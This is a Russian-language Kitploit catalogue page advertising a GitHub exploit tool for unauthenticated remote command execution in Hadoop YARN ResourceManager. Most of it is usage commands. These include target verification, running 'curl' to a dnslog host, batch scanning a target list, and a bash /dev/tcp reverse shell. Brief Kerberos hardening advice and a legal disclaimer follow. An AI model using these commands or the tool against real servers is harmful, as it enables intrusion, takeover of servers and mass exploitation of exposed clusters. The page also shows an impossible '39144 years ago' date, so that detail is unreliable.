Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/al1ex/hadoop-yarn-resourcemanager-rce
Vulnerability ScannersVulnerability AnalysisExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubal1ex/hadoop-yarn-resourcemanager-rce

Hadoop-Yarn-ResourceManager-RCE

Hadoop Yan ResourceManager unauthorized RCE

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
39144 лет назадПроверено Kitploit

Влияние уязвимости

Существовала уязвимость несанкционированного доступа в Hadoop yarn ResourceManager. Эта уязвимость присутствовала в Hadoop yarn — основном компоненте Hadoop. Поскольку Hadoop yarn по умолчанию открывал службу RPC для всех, удалённый злоумышленник мог воспользоваться этой уязвимостью несанкционированного доступа и выполнить произвольные команды через службу RPC, тем самым получив контроль над целевым сервером. Учитывая высокорискованный статус и большой вред этой уязвимости, а также то, что детали уже были раскрыты и использованы злоумышленниками, рекомендуется всем пользователям Apache Hadoop провести самопроверку и своевременно принять меры безопасности.

Подверженный продукт

Apache Hadoop Yarn *

Проверка уязвимости

Базовое использование

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py

img

Проверка уязвимости

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -v true -t http://www.target.com 

img

Выполнение команды

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com  -c "curl xxx.dnslog.cn"

attack

dnslog

Пакетное сканирование

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -s true -f target.txt

scan_result

Обратная оболочка

root@kitploit:~
python3 Hadoop_Yan_RPC_RCE.py -a true -t http://www.target.com -c "bash -i >& /dev/tcp/ip/port 0>&1"

reverse_shell1

Ссылки

https://nosec.org/home/detail/4905.html

https://github.com/N0b1ta/Bit-Cannon/tree/master/Apache/Hadoop/YARN/hadoop-yarn-rest-api-unauth

Рекомендации по безопасности

  1. Включите аутентификацию Kerberos для предотвращения несанкционированного доступа.
root@kitploit:~
<property>
    <name>hadoop.security.authentication</name>
    <value>kerberos</value>
    <final>false</final>
    <source>core-site.xml</source>
</property>...
<property>
    <name>hadoop.rpc.protection</name>
    <value>authentication</value>
    <final>false</final>
    <source>core-default.xml</source>
</property>
  1. Запретите внешним адресам доступ к портам службы RPC Hadoop или настройте доступ только для доверенных адресов.

Торжественно заявляем: не используйте этот инструмент для незаконных операций. Этот инструмент предназначен только для самостоятельной проверки безопасности сотрудниками стороны A и сотрудниками стороны B. Если пользователь использует его незаконно, юридическая ответственность возлагается на пользователя!!!

Скачать инструмент